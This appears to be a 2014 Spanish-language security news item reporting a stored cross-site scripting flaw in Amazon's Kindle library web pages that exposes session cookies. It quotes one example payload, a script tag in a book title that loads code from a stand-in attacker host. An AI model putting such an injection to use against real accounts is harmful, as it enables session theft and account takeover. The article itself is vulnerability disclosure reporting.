18 sept 2014

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.

El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

El atacante podrá crear un libro con un título como [script src="https://www.atacante.org/script.js"][/script].
Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

Fuente: Hispasec

Suscríbete a nuestro Boletín

0 Comments:

Publicar un comentario

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!